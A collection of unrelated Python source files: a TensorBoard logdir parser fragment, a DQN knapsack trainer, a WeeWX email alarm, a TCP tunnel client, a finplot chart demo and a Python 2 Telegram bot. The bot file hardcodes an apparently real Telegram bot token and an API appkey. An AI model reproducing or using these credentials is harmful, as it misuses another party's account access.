  Each comma-separated entry is either 'group_name:/path' or a bare path
  (unnamed group, mapped to None). Entries that look like URIs, e.g.
  'gs://bucket/dir', are kept verbatim; plain filesystem paths are
  resolved with os.path.realpath. Group names cannot start with '/':
  /foo:bar/baz is treated as an unnamed path containing a colon.
  Globs are not supported.

  Args:
    logdir: A comma-separated list of run specifications, or None.

  Returns:
    A dict mapping directory paths to names like {'/path/to/dir': 'name'}.
    Unnamed groups map to None. None input yields an empty dict.
  """
  run_map = {}
  if logdir is None:
    return run_map
  # Make sure keeping consistent with ParseURI in core/lib/io/path.cc
  uri_pattern = re.compile('[a-zA-Z][0-9a-zA-Z.]*://.*')
  for spec in logdir.split(','):
    # A spec starting 'xyz://' is a URI, and one starting '/' is a path
    # that may simply contain a colon; only the remaining colon-bearing
    # specs carry a group name.
    is_named = (uri_pattern.match(spec) is None and ':' in spec
                and spec[0] != '/')
    if is_named:
      # Split on the FIRST colon only so 'name:/path:with/colon' works.
      run_name, _, path = spec.partition(':')
    else:
      run_name = None
      path = spec
    if uri_pattern.match(path) is None:
      path = os.path.realpath(path)
    run_map[path] = run_name
  return run_map
def reload_multiplexer(multiplexer, path_to_run):
  """Loads all runs into the multiplexer, logging the total duration.

  Args:
    multiplexer: The `EventMultiplexer` to add runs to and reload.
    path_to_run: A dict mapping from paths to run names, where `None` as the
      run name is interpreted as a run name equal to the path.
  """
  begin = time.time()
  logging.info('TensorBoard reload process beginning')
  for directory, run_name in six.iteritems(path_to_run):
    multiplexer.AddRunsFromDirectory(directory, run_name)
  logging.info('TensorBoard reload process: Reload the whole Multiplexer')
  multiplexer.Reload()
  elapsed = time.time() - begin
  logging.info('TensorBoard done reloading. Load took %0.3f secs', elapsed)
def start_reloading_multiplexer(multiplexer, path_to_run, load_interval):
  """Starts a daemon thread that reloads the multiplexer forever.

  The thread calls `reload_multiplexer` immediately and then again every
  `load_interval` seconds.

  Args:
    multiplexer: The `EventMultiplexer` to add runs to and reload.
    path_to_run: A dict mapping from paths to run names, where `None` as the
      run name is interpreted as a run name equal to the path.
    load_interval: How many seconds to wait after one load before starting
      the next load.

  Returns:
    A started `threading.Thread` that reloads the multiplexer.
  """
  # multiplexer.Reload() is deliberately not invoked inline here, so that
  # AddRunsFromDirectory does not block until every run has loaded.
  def _loop():
    while True:
      reload_multiplexer(multiplexer, path_to_run)
      time.sleep(load_interval)

  reload_thread = threading.Thread(target=_loop)
  reload_thread.daemon = True
  reload_thread.start()
  return reload_thread
def get_tensorboard_tag():
  """Read the TensorBoard TAG number, and return it or an empty string."""
  # The bundled 'tensorboard/TAG' resource holds the release tag; strip the
  # trailing newline.
  tag = resource_loader.load_resource('tensorboard/TAG').strip()
  return tag
|
bounded_knsapsack_dqn_main.py | #!/usr/bin/env python3
import time
import torch
import torch.multiprocessing as mp
from torch import optim
import os
import numpy as np
from codes.f_utils.common_utils import make_or_gym_env
from config.names import EnvironmentName, PROJECT_HOME
print(torch.__version__)
from common.fast_rl import actions, value_based_model, rl_agent, experience_single, replay_buffer
from common.fast_rl.common import statistics, utils
from config.parameters import PARAMETERS as params
# Directory where periodic model snapshots are written; created on import.
MODEL_SAVE_DIR = os.path.join(PROJECT_HOME, "out", "model_save_files")
if not os.path.exists(MODEL_SAVE_DIR):
    os.makedirs(MODEL_SAVE_DIR)
# Work around duplicate-OpenMP-runtime aborts (common with PyTorch setups).
os.environ['KMP_DUPLICATE_LIB_OK'] = 'True'
# Pick the torch device; params.CUDA can still force CPU even if CUDA exists.
if torch.cuda.is_available():
    device = torch.device("cuda" if params.CUDA else "cpu")
else:
    device = torch.device("cpu")
def play_func(exp_queue, env, net):
    """Actor loop: roll out episodes with an epsilon-greedy DQN agent,
    pushing each transition into exp_queue; pushes None when done.

    Runs in a spawned child process (see main); `net` is shared with the
    trainer process, which updates its weights.
    """
    action_selector = actions.EpsilonGreedyDQNActionSelector(epsilon=params.EPSILON_INIT)
    # Anneals epsilon from EPSILON_INIT to EPSILON_MIN over EPSILON_MIN_STEP steps.
    epsilon_tracker = actions.EpsilonTracker(
        action_selector=action_selector,
        eps_start=params.EPSILON_INIT,
        eps_final=params.EPSILON_MIN,
        eps_frames=params.EPSILON_MIN_STEP
    )
    agent = rl_agent.DQNAgent(net, action_selector, device=device)
    experience_source = experience_single.ExperienceSourceSingleEnvFirstLast(env, agent, gamma=params.GAMMA, steps_count=params.N_STEP)
    exp_source_iter = iter(experience_source)
    if params.DRAW_VIZ:
        stat = statistics.StatisticsForValueBasedRL(method="nature_dqn")
    else:
        stat = None
    step_idx = 0
    next_save_frame_idx = params.MODEL_SAVE_STEP_PERIOD
    with utils.RewardTracker(params=params, frame=False, stat=stat) as reward_tracker:
        while step_idx < params.MAX_GLOBAL_STEP:
            step_idx += 1
            exp = next(exp_source_iter)
            exp_queue.put(exp)
            # NOTE(review): "udpate" looks misspelled -- confirm it matches the
            # actual EpsilonTracker API in common.fast_rl.actions before renaming.
            epsilon_tracker.udpate(step_idx)
            episode_rewards = experience_source.pop_episode_reward_lst()
            if episode_rewards:
                solved, mean_episode_reward = reward_tracker.set_episode_reward(
                    episode_rewards[0], step_idx, action_selector.epsilon
                )
                # NOTE(review): net.__name__ assumes the network object exposes
                # __name__; plain nn.Module instances normally do not -- verify.
                if step_idx >= next_save_frame_idx:
                    rl_agent.save_model(
                        MODEL_SAVE_DIR, params.ENVIRONMENT_ID.value, net.__name__, net, step_idx, mean_episode_reward
                    )
                    next_save_frame_idx += params.MODEL_SAVE_STEP_PERIOD
                if solved:
                    rl_agent.save_model(
                        MODEL_SAVE_DIR, params.ENVIRONMENT_ID.value, net.__name__, net, step_idx, mean_episode_reward
                    )
                    break
    # Sentinel telling the trainer loop that no more experiences will arrive.
    exp_queue.put(None)
def main():
    """Trainer process: build env/net, spawn the actor, run prioritized
    double-DQN updates until the actor process exits."""
    mp.set_start_method('spawn')
    # Fixed 5-item bounded-knapsack instance with action masking enabled.
    env_config = {
        'N': 5,
        'max_weight': 15,
        'item_weights': np.array([1, 12, 2, 1, 4]),
        'item_values': np.array([2, 4, 2, 1, 10]),
        'mask': True
    }
    assert params.ENVIRONMENT_ID == EnvironmentName.KNAPSACK_V2
    env = make_or_gym_env(params.ENVIRONMENT_ID.value, env_config=env_config)
    print("Max weight capacity:\t{}kg".format(env.max_weight))
    print("Number of items:\t{}".format(env.N))
    # 3 observation features for each of the N items plus one aggregate row.
    obs_size = (env_config['N'] + 1) * 3
    net = value_based_model.DuelingDQNMLP(
        obs_size=obs_size,
        hidden_size_1=128, hidden_size_2=128,
        n_actions=5
    ).to(device)
    print(net)
    target_net = rl_agent.TargetNet(net)
    buffer = replay_buffer.PrioReplayBuffer(experience_source=None, buffer_size=params.REPLAY_BUFFER_SIZE)
    optimizer = optim.Adam(net.parameters(), lr=params.LEARNING_RATE)
    # Small bounded queue keeps the actor from running far ahead of training.
    exp_queue = mp.Queue(maxsize=params.TRAIN_STEP_FREQ * 2)
    play_proc = mp.Process(target=play_func, args=(exp_queue, env, net))
    play_proc.start()
    time.sleep(0.5)
    if params.DRAW_VIZ:
        stat_for_value_optimization = statistics.StatisticsForValueBasedOptimization()
    else:
        stat_for_value_optimization = None
    step_idx = 0
    while play_proc.is_alive():
        step_idx += params.TRAIN_STEP_FREQ
        for _ in range(params.TRAIN_STEP_FREQ):
            exp = exp_queue.get()
            if exp is None:
                play_proc.join()
                # Breaks only this for-loop; the while-loop then exits because
                # play_proc is no longer alive.
                break
            buffer._add(exp)
        if len(buffer) < params.MIN_REPLAY_SIZE_FOR_TRAIN:
            if params.DRAW_VIZ and step_idx % 100 == 0:
                stat_for_value_optimization.draw_optimization_performance(step_idx, 0.0)
            continue
        optimizer.zero_grad()
        batch, batch_indices, batch_weights = buffer.sample(params.BATCH_SIZE)
        loss_v, sample_prios = value_based_model.calc_loss_per_double_dqn(
            buffer.buffer, batch, batch_indices, batch_weights, net, target_net, params, cuda=params.CUDA, cuda_async=True
        )
        loss_v.backward()
        optimizer.step()
        # PER bookkeeping: refresh priorities and anneal importance-sampling beta.
        buffer.update_priorities(batch_indices, sample_prios.data.cpu().numpy())
        buffer.update_beta(step_idx)
        if params.DRAW_VIZ and step_idx % 100 == 0:
            stat_for_value_optimization.draw_optimization_performance(step_idx, loss_v.item())
        # Sync the target network once per TARGET_NET_SYNC_STEP_PERIOD steps.
        if step_idx % params.TARGET_NET_SYNC_STEP_PERIOD < params.TRAIN_STEP_FREQ:
            target_net.sync()
# Guard is required: spawned multiprocessing workers re-import this module.
if __name__ == "__main__":
    main()
alarm.py | # Copyright (c) 2009-2019 Tom Keffer <tkeffer@gmail.com>
# See the file LICENSE.txt for your rights.
"""Example of how to implement an alarm in WeeWX.
*******************************************************************************
To use this alarm, add the following to the weewx configuration file:
[Alarm]
expression = "outTemp < 40.0"
time_wait = 3600
smtp_host = smtp.example.com
smtp_user = myusername
smtp_password = mypassword
from = sally@example.com
mailto = jane@example.com, bob@example.com
subject = "Alarm message from weewx!"
In this example, if the outside temperature falls below 40, it will send an
email to the users specified in the comma separated list specified in option
"mailto", in this case:
jane@example.com, bob@example.com
The example assumes an SMTP email server at smtp.example.com that requires
login. If the SMTP server does not require login, leave out the lines for
smtp_user and smtp_password.
Setting an email "from" is optional. If not supplied, one will be filled in,
but your SMTP server may or may not accept it.
Setting an email "subject" is optional. If not supplied, one will be filled in.
To avoid a flood of emails, one will only be sent every 3600 seconds (one
hour).
*******************************************************************************
To enable this service:
1) copy this file to the user directory
2) modify the weewx configuration file by adding this service to the option
"report_services", located in section [Engine][[Services]].
[Engine]
[[Services]]
...
report_services = weewx.engine.StdPrint, weewx.engine.StdReport, user.alarm.MyAlarm
*******************************************************************************
If you wish to use both this example and the lowBattery.py example, simply
merge the two configuration options together under [Alarm] and add both
services to report_services.
*******************************************************************************
"""
import smtplib
import socket
import syslog
import threading
import time
from email.mime.text import MIMEText
import weewx
from weeutil.weeutil import timestamp_to_string, option_as_list
from weewx.engine import StdService
# Inherit from the base class StdService:
class MyAlarm(StdService):
    """Service that sends email if an arbitrary expression evaluates true"""

    def __init__(self, engine, config_dict):
        """Read the [Alarm] options and, if they are complete, bind to the
        NEW_ARCHIVE_RECORD event. A missing mandatory option disables the alarm."""
        # Pass the initialization information on to my superclass:
        super(MyAlarm, self).__init__(engine, config_dict)
        # This will hold the time when the last alarm message went out:
        self.last_msg_ts = 0
        try:
            # Dig the needed options out of the configuration dictionary.
            # If a critical option is missing, an exception will be raised and
            # the alarm will not be set.
            self.expression = config_dict['Alarm']['expression']
            self.time_wait = int(config_dict['Alarm'].get('time_wait', 3600))
            self.timeout = int(config_dict['Alarm'].get('timeout', 10))
            self.smtp_host = config_dict['Alarm']['smtp_host']
            # Optional: if no user is configured, no SMTP login is attempted.
            self.smtp_user = config_dict['Alarm'].get('smtp_user')
            self.smtp_password = config_dict['Alarm'].get('smtp_password')
            self.SUBJECT = config_dict['Alarm'].get('subject', "Alarm message from weewx")
            self.FROM = config_dict['Alarm'].get('from', 'alarm@example.com')
            self.TO = option_as_list(config_dict['Alarm']['mailto'])
            syslog.syslog(syslog.LOG_INFO, "alarm: Alarm set for expression: '%s'" % self.expression)
            # If we got this far, it's ok to start intercepting events:
            self.bind(weewx.NEW_ARCHIVE_RECORD, self.new_archive_record)  # NOTE 1
        except KeyError as e:
            syslog.syslog(syslog.LOG_INFO, "alarm: No alarm set. Missing parameter: %s" % e)

    def new_archive_record(self, event):
        """Gets called on a new archive record event."""
        # To avoid a flood of nearly identical emails, this will do
        # the check only if we have never sent an email, or if we haven't
        # sent one in the last self.time_wait seconds:
        if not self.last_msg_ts or abs(time.time() - self.last_msg_ts) >= self.time_wait:
            # Get the new archive record:
            record = event.record
            # Be prepared to catch an exception in the case that the expression contains
            # a variable that is not in the record:
            try:  # NOTE 2
                # Evaluate the expression in the context of the event archive record.
                # Sound the alarm if it evaluates true.
                # SECURITY NOTE: eval() runs arbitrary code from the config file;
                # the configuration must be trusted.
                if eval(self.expression, None, record):  # NOTE 3
                    # Sound the alarm!
                    # Launch in a separate thread so it doesn't block the main LOOP thread:
                    t = threading.Thread(target=MyAlarm.sound_the_alarm, args=(self, record))
                    t.start()
                    # Record when the message went out:
                    self.last_msg_ts = time.time()
            except NameError as e:
                # The record was missing a named variable. Log it.
                syslog.syslog(syslog.LOG_DEBUG, "alarm: %s" % e)

    def sound_the_alarm(self, rec):
        """Sound the alarm in a 'try' block"""
        # Wrap the attempt in a 'try' block so we can log a failure.
        try:
            self.do_alarm(rec)
        except socket.gaierror:
            # A gaierror exception is usually caused by an unknown host
            syslog.syslog(syslog.LOG_CRIT, "alarm: unknown host %s" % self.smtp_host)
            # Reraise the exception. This will cause the thread to exit.
            raise
        except Exception as e:
            syslog.syslog(syslog.LOG_CRIT, "alarm: unable to sound alarm. Reason: %s" % e)
            # Reraise the exception. This will cause the thread to exit.
            raise

    def do_alarm(self, rec):
        """Send an email out describing the record that triggered the alarm."""
        # Get the time and convert to a string:
        t_str = timestamp_to_string(rec['dateTime'])
        # Log the alarm
        syslog.syslog(syslog.LOG_INFO, 'alarm: Alarm expression "%s" evaluated True at %s' % (self.expression, t_str))
        # Form the message text:
        msg_text = 'Alarm expression "%s" evaluated True at %s\nRecord:\n%s' % (self.expression, t_str, str(rec))
        # Convert to MIME:
        msg = MIMEText(msg_text)
        # Fill in MIME headers:
        msg['Subject'] = self.SUBJECT
        msg['From'] = self.FROM
        msg['To'] = ','.join(self.TO)
        try:
            # First try end-to-end encryption
            s = smtplib.SMTP_SSL(self.smtp_host, timeout=self.timeout)
            syslog.syslog(syslog.LOG_DEBUG, "alarm: using SMTP_SSL")
        except (AttributeError, socket.timeout, socket.error):
            syslog.syslog(syslog.LOG_DEBUG, "alarm: unable to use SMTP_SSL connection.")
            # If that doesn't work, try creating an insecure host, then upgrading
            s = smtplib.SMTP(self.smtp_host, timeout=self.timeout)
            try:
                # Be prepared to catch an exception if the server
                # does not support encrypted transport.
                s.ehlo()
                s.starttls()
                s.ehlo()
                syslog.syslog(syslog.LOG_DEBUG,
                              "alarm: using SMTP encrypted transport")
            except smtplib.SMTPException:
                # Fall back to plain text as a last resort.
                syslog.syslog(syslog.LOG_DEBUG,
                              "alarm: using SMTP unencrypted transport")
        try:
            # If a username has been given, assume that login is required for this host:
            if self.smtp_user:
                s.login(self.smtp_user, self.smtp_password)
                syslog.syslog(syslog.LOG_DEBUG, "alarm: logged in with user name %s" % self.smtp_user)
            # Send the email:
            s.sendmail(msg['From'], self.TO, msg.as_string())
            # Log out of the server:
            s.quit()
        except Exception as e:
            syslog.syslog(syslog.LOG_ERR, "alarm: SMTP mailer refused message with error %s" % e)
            raise
        # Log sending the email:
        syslog.syslog(syslog.LOG_INFO, "alarm: email sent to: %s" % self.TO)
if __name__ == '__main__':
    # NOTE: this triple-quoted string is a plain expression statement, not a
    # docstring -- it is evaluated and discarded. Kept for its explanatory value.
    """This section is used to test alarm.py. It uses a record and alarm
    expression that are guaranteed to trigger an alert.
    You will need a valid weewx.conf configuration file with an [Alarm]
    section that has been set up as illustrated at the top of this file."""
    from optparse import OptionParser
    import weecfg

    usage = """Usage: python alarm.py --help
python alarm.py [CONFIG_FILE|--config=CONFIG_FILE]
Arguments:
CONFIG_PATH: Path to weewx.conf """
    epilog = """You must be sure the WeeWX modules are in your PYTHONPATH. For example:
PYTHONPATH=/home/weewx/bin python alarm.py --help"""
    weewx.debug = 1
    # Set defaults for the system logger:
    syslog.openlog('alarm.py', syslog.LOG_PID | syslog.LOG_CONS)
    syslog.setlogmask(syslog.LOG_UPTO(syslog.LOG_DEBUG))
    # Create a command line parser:
    parser = OptionParser(usage=usage,
                          epilog=epilog)
    parser.add_option("--config", dest="config_path", metavar="CONFIG_FILE",
                      help="Use configuration file CONFIG_FILE.")
    # Parse the arguments and options
    (options, args) = parser.parse_args()
    try:
        config_path, config_dict = weecfg.read_config(options.config_path, args)
    except IOError as e:
        exit("Unable to open configuration file: %s" % e)
    print("Using configuration file %s" % config_path)
    if 'Alarm' not in config_dict:
        exit("No [Alarm] section in the configuration file %s" % config_path)
    # This is a fake record that we'll use
    rec = {'extraTemp1': 1.0,
           'outTemp': 38.2,
           'dateTime': int(time.time())}
    # Use an expression that will evaluate to True by our fake record.
    config_dict['Alarm']['expression'] = "outTemp<40.0"
    # We need the main WeeWX engine in order to bind to the event, but we don't need
    # for it to completely start up. So get rid of all services:
    config_dict['Engine']['Services'] = {}
    # Now we can instantiate our slim engine...
    engine = weewx.engine.StdEngine(config_dict)
    # ... and set the alarm using it.
    alarm = MyAlarm(engine, config_dict)
    # Create a NEW_ARCHIVE_RECORD event
    event = weewx.Event(weewx.NEW_ARCHIVE_RECORD, record=rec)
    # Use it to trigger the alarm:
    alarm.new_archive_record(event)
|
tunnel_tcp.py | import sys
import json
import threading
import websockets
import ssl
import certifi
from .tcp import Client
ssl_context = ssl.create_default_context()
ssl_context.load_verify_locations(certifi.where())
async def open_tcp_tunnel(ws_uri, remote_server_host, local_server_port, local_server_host):
    """Open the websocket control channel, print the tunnel status banner and
    relay each announced connection to the local server on its own thread."""
    async with websockets.connect(ws_uri, ssl=ssl_context) as websocket:
        handshake = json.loads(await websocket.recv())
        warning = handshake.get("warning")
        if warning:
            print(warning, file=sys.stderr)
        error = handshake.get("error")
        if error:
            # The server refused the tunnel; report and bail out.
            print(error, file=sys.stderr)
            return
        public_server_port = handshake["public_server_port"]
        private_server_port = handshake["private_server_port"]
        print(f"\033[32m{'Tunnel Status':<25}Online\033[00m")
        print(f"{'Forwarded':<25}{f'{remote_server_host}:{public_server_port} → {local_server_host}:{local_server_port}'}\n")
        client = Client(
            remote_server_host=remote_server_host,
            remote_server_port=private_server_port,
            local_server_host=local_server_host,
            local_server_port=local_server_port,
        )
        while True:
            announcement = json.loads(await websocket.recv())
            print("New Connection +1")
            threading.Thread(target=client.process, args=(announcement, websocket)).start()
|
thread.py | import threading
def fire_and_forget(f):
    """Decorator: run the wrapped callable on a background thread, returning at once.

    Fixes over the previous version: arguments are now forwarded to *f* (they
    were silently dropped before, so only zero-argument functions worked),
    ``functools.wraps`` preserves *f*'s name/docstring, and the started
    ``threading.Thread`` is returned so callers may ``join`` it if needed
    (backward compatible -- the old wrapper returned ``None``).

    Example
    ----------
    .. code-block::

        @fire_and_forget
        def send_analytics():
            ...
    """
    import functools  # local import: keeps module-level deps unchanged

    @functools.wraps(f)
    def wrapped(*args, **kwargs):
        worker = threading.Thread(target=f, args=args, kwargs=kwargs)
        worker.start()
        return worker

    return wrapped
|
dockable.py | #!/usr/bin/env python3
import finplot as fplt
from functools import lru_cache
from PyQt5.QtWidgets import QApplication, QGridLayout, QMainWindow, QGraphicsView, QComboBox, QLabel
from pyqtgraph.dockarea import DockArea, Dock
from threading import Thread
import yfinance as yf
# Qt application, main window and the dock area that hosts the three chart docks.
app = QApplication([])
win = QMainWindow()
area = DockArea()
win.setCentralWidget(area)
win.resize(1600, 800)
win.setWindowTitle("Docking charts example for finplot")
# Set width/height of QSplitter
win.setStyleSheet("QSplitter { width : 20px; height : 20px; }")
# Create docks (closable so the user can dismiss individual charts)
dock_0 = Dock("dock_0", size=(1000, 100), closable=True)
dock_1 = Dock("dock_1", size=(1000, 100), closable=True)
dock_2 = Dock("dock_2", size=(1000, 100), closable=True)
area.addDock(dock_0)
area.addDock(dock_1)
area.addDock(dock_2)
# Create example charts: an editable symbol picker plus a name label in dock_0
combo = QComboBox()
combo.setEditable(True)
[combo.addItem(i) for i in "AMRK FB GFN REVG TSLA TWTR WMT CT=F GC=F ^FTSE ^N225 EURUSD=X ETH-USD".split()]
dock_0.addWidget(combo, 0, 0, 1, 1)
info = QLabel()
dock_0.addWidget(info, 0, 1, 1, 1)
# Three stacked finplot axes, one per dock (price / moving averages / volume)
ax0, ax1, ax2 = fplt.create_plot_widget(master=area, rows=3, init_zoom_periods=100)
area.axs = [ax0, ax1, ax2]
dock_0.addWidget(ax0.ax_widget, 1, 0, 1, 2)
dock_1.addWidget(ax1.ax_widget, 1, 0, 1, 2)
dock_2.addWidget(ax2.ax_widget, 1, 0, 1, 2)
# Link x-axis so panning/zooming one chart moves the others
ax1.setXLink(ax0)
ax2.setXLink(ax0)
win.axs = [ax0]
@lru_cache(maxsize=15)
def download(symbol):
    """Fetch (and memoize) daily price history for *symbol* since 2019-01-01."""
    return yf.download(symbol, "2019-01-01")
@lru_cache(maxsize=100)
def get_name(symbol):
    """Fetch (and memoize) the ticker's short display name -- a slow network call."""
    return yf.Ticker(symbol).info["shortName"]
plots = []  # NOTE(review): never appended to or read below -- appears unused


def update(txt):
    """Redraw all three docked charts for the symbol text *txt*."""
    df = download(txt)
    if len(df) < 20:  # symbol does not exist
        return
    info.setText("Loading symbol name...")
    price = df["Open Close High Low".split()]
    ma20 = df.Close.rolling(20).mean()
    ma50 = df.Close.rolling(50).mean()
    volume = df["Open Close Volume".split()]
    ax0.reset()  # remove previous plots
    ax1.reset()  # remove previous plots
    ax2.reset()  # remove previous plots
    fplt.candlestick_ochl(price, ax=ax0)
    fplt.plot(ma20, legend="MA-20", ax=ax1)
    fplt.plot(ma50, legend="MA-50", ax=ax1)
    fplt.volume_ocv(volume, ax=ax2)
    fplt.refresh()  # refresh autoscaling when all plots complete
    # Name lookup hits the network; update the label off the GUI thread.
    Thread(target=lambda: info.setText(get_name(txt))).start()  # slow, so use thread
# Hook up symbol selection and draw the initially selected symbol.
combo.currentTextChanged.connect(update)
update(combo.currentText())
fplt.show(qt_exec=False)  # prepares plots when they're all setup
win.show()
app.exec_()
|
app.py | # -*- coding: utf-8 -*-
from datetime import datetime
from flask import Flask
from flask import render_template, request
import logging
import telegram
import leancloud
from leancloud import Engine, Query, Object, LeanCloudError
import random
import re
import sys
import urllib2
import json
import threading
# Python 2 only: re-expose setdefaultencoding so non-ASCII text round-trips as UTF-8.
reload(sys)
sys.setdefaultencoding('utf-8')
app = Flask(__name__)
logging.basicConfig(level=logging.DEBUG,
                    format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')
bot_name = '@hellochain_bot'
global bot  # NOTE(review): `global` at module level is a no-op
# Because the US node can only be deployed via git, the token had to be committed
# in the open. Please do not take it for your own use; to generate your own token
# contact http://telegram.me/BotFather. Thanks!
bot = telegram.Bot(token='592757318:AAFF9fFtPiO0DoQEa1-zwxjtKbCXQqen8Rw')
songci_api = 'http://api.jisuapi.com/songci/search?appkey=7528478e273bd00b&keyword='
@app.route('/')
def index():
    # Health-check endpoint; returns a fixed JSON-ish body.
    return r'{"drakeet":"hehe"}'
@app.route('/<token>', methods=['POST'])
def launcher(token):
    """Telegram webhook endpoint: parse the update and hand it to handle_message.

    Always answers 'ok' so Telegram does not keep retrying a failing update.
    """
    if request.method == "POST":
        update = telegram.Update.de_json(request.get_json(force=True), bot)
        logging.info('I am still alive.')
        try:
            handle_message(update.message)
        except Exception:
            # Was a bare `except:`, which also swallowed SystemExit /
            # KeyboardInterrupt and discarded the traceback. Keep the
            # best-effort behavior but log the full cause.
            logging.exception('handle_message ERROR')
    return 'ok'
def handle_message(message):
    """Dispatch an incoming Telegram message to the matching command handler."""
    text = message.text
    if text is None:
        logging.info('Warning: message.text == None')
        return
    # First substring match wins; order mirrors the original command priority.
    # (/pic and /delpic are intentionally disabled.)
    dispatch = (
        ('/echo', echo),
        ('/milestone', milestone),
        ('/help', help),
        ('/getmylastat', get_my_last_at),
        ('/songci', songci),
        ('/alias', alias),
        ('/xu', xu),
    )
    for token, handler in dispatch:
        if token in text:
            handler(message)
            break
    else:
        # Plain chatter (no command, no mention) goes through the alias expander.
        if '@' not in text and '/' not in text:
            alias_filter(message)
    # Mentions without a command are remembered for /getmylastat.
    if '/' not in text and '@' in text:
        save_at_message(message)
    logging.info(text)
def help(message):
    """Send the command overview to the chat the request came from."""
    # NOTE: the name shadows the builtin `help`, but callers depend on it.
    lines = (
        '/echo - Repeat the same message back',
        "/milestone - Get drakeet's milestone",
        '/getmylastat - Get my last @ message',
        '/pic - Curiosity killed the cat',
        '/delpic - Delete pic by its num',
        '/songci - TEXT',
    )
    bot.sendMessage(chat_id=message.chat.id, text='\n'.join(lines))
def parse_cmd_text(text):
    """Split a message into (command, remainder).

    Returns (None, encoded_text) when the text is not a command, and
    (text, None) when there is a command but no space after it. The bot's own
    @name is stripped from the command.

    Python 2 only: `text.encode('utf-8')` yields a byte *str* here; under
    Python 3 the `'/' in text` checks below would fail on bytes.
    """
    # Telegram understands UTF-8, so encode text for unicode compatibility
    text = text.encode('utf-8')
    cmd = None
    if '/' in text:
        try:
            index = text.index(' ')
        except ValueError as e:
            # Command with no arguments, e.g. "/help".
            return (text, None)
        cmd = text[:index]
        text = text[index + 1:]
    if cmd != None and '@' in cmd:
        # "/cmd@hellochain_bot" -> "/cmd"
        cmd = cmd.replace(bot_name, '')
    return (cmd, text)
def parse_text_array(text):
    """Split *text* on whitespace; ``None`` maps to an empty list."""
    return [] if text is None else text.split()
def get_nickname(user):
    """Build a display name from the user's first/last name.

    Returns "first last" when both are set, whichever one is set otherwise,
    and None when neither is set.
    """
    first, last = user.first_name, user.last_name
    if first is not None and last is not None:
        return '%s %s' % (first, last)
    if first is None:
        return last
    return first
def send_successful(message):
    """Reply 'Successful' to the message that triggered the current command."""
    bot.sendMessage(chat_id=message.chat.id, reply_to_message_id=message.message_id, text='Successful')
def echo(message):
    """Repeat the text following the /echo command back to the same chat."""
    _cmd, text = parse_cmd_text(message.text)
    # Nothing to echo when the command had no argument text.
    if text:
        bot.sendMessage(chat_id=message.chat.id, text=text)
def milestone(message):
    """Announce how many days have passed since the anniversary date."""
    anniversary = datetime(2013, 7, 16)
    days = (datetime.now() - anniversary).days
    reply = 'drakeet 和他家老婆大人已经认识并相爱 %d 天啦(此处应该有恭喜' % days
    bot.sendMessage(chat_id=message.chat.id, text=reply)
def random_line(afile):
    """Return one line chosen uniformly at random from the iterable *afile*.

    Classic reservoir sampling with a reservoir of one: the k-th line (0-based
    after the first) replaces the current choice with probability 1/(k+2).
    """
    chosen = next(afile)
    for seen, candidate in enumerate(afile):
        if random.randrange(seen + 2) == 0:
            chosen = candidate
    return chosen
def random_text(message):
    '''
    Deprecated
    '''
    # Pick one random row from the LeanCloud Text table by skipping a random offset.
    Text = Object.extend('Text')
    _query = Query(Text)
    count = _query.count()
    skip = random.randint(0, count - 1)
    texts = _query.limit(1).skip(skip).find()
    if len(texts) == 1:
        text = texts[0]
    else:
        return
    # NOTE(review): `text` is a LeanCloud object, not a string -- presumably a
    # field of the object was meant; verify before reviving this code.
    bot.sendMessage(chat_id=message.chat.id, text=text)
AtMessage = Object.extend('AtMessage')  # LeanCloud table of saved @-mention messages


def save_at_message_with_username(message, username):
    """Persist an @-mention so /getmylastat can quote it back later."""
    msg = AtMessage()
    msg.set('owner', username)
    msg.set('mid', message.message_id)
    msg.set('chat_id', message.chat.id)
    msg.save()
def save_at_message(message):
    """Extract the first @username from the message text and store the mention."""
    try:
        # NOTE(review): the pattern requires whitespace after the name, so a
        # message *ending* in "@user" is silently ignored -- confirm if intended.
        username = re.findall(r'@(\w*)\s', message.text)[0]
    except IndexError as e:
        # No mention matched; nothing to save.
        return
    save_at_message_with_username(message, username)
def get_my_last_at(message):
    '''
    Quote back the newest stored @-mention of the requesting user in this chat.
    todo: relate the origin chat id.
    '''
    query = Query(AtMessage)
    query.descending('createdAt')
    query.equal_to('owner', message.from_user.username)
    query.equal_to('chat_id', message.chat.id)
    try:
        msg = query.first()
    except LeanCloudError as e:
        # No stored mention for this user in this chat.
        bot.sendMessage(chat_id=message.chat.id, reply_to_message_id=message.message_id, text='你在本群还没有任何 AT 消息。')
        return
    text = 'Here you are.'
    message_id = msg.get('mid')
    # Replying to the stored message id makes Telegram quote the original mention.
    bot.sendMessage(chat_id=message.chat.id, reply_to_message_id=message_id, text=text)
Pic = Object.extend('Pic')  # LeanCloud table: pids listed here are blocked from /pic


def pic(message):
    """Send a random (or explicitly numbered) picture from the CDN."""
    cmd, text = parse_cmd_text(message.text)
    url = None
    base_url = 'http://7xqh4i.com1.z0.glb.clouddn.com/pic'
    if text != None:
        # Explicit number requested: /pic <num>
        url = base_url + str(text)
        pic_num = text
    else:
        # Pick a random pic number that is not on the block list.
        query = Query(Pic)
        pics = query.find()
        bolcks = [pic.get('pid') for pic in pics]  # sic: "blocks"
        pic_num = None
        size_of_images = 330  # 0~size_of_images
        while pic_num == None or str(pic_num) in bolcks:
            pic_num = random.randint(0, size_of_images)
        url = base_url + str(pic_num)
    bot.sendChatAction(chat_id=message.chat.id, action=telegram.ChatAction.UPLOAD_PHOTO)

    def send_photo_task():
        # Uploading can be slow; run it off the request thread.
        bot.sendPhoto(chat_id=message.chat.id,
                      photo=url + '.jpg',
                      caption=pic_num)

    t = threading.Thread(target=send_photo_task)
    t.start()
def delpic(message):
    """Add a picture number to the block list so /pic never serves it again."""
    cmd, text = parse_cmd_text(message.text)
    if text == None:
        bot.sendMessage(chat_id=message.chat.id, reply_to_message_id=message.message_id, text='Use /delpic <pic\'s num>')
        return
    query = Query(Pic)
    query.equal_to('pid', text)
    pics = query.find()
    if pics == None or len(pics) == 0:
        # Not blocked yet: record the pid.
        pic = Pic()
        pic.set('pid', text)
        pic.save()
    # Reported as successful even when the pid was already blocked.
    send_successful(message)
def songci(message):
    """Look up a Song ci poem by name via the jisuapi service and send it back.

    The raw API response is archived to the LeanCloud 'Songci' table.
    """
    cmd, text = parse_cmd_text(message.text)
    if text == None or len(text) == 0:
        bot.sendMessage(chat_id=message.chat.id,
                        reply_to_message_id=message.message_id,
                        text='请使用 /songci <词名>')
        return
    bot.sendChatAction(chat_id=message.chat.id, action=telegram.ChatAction.TYPING)
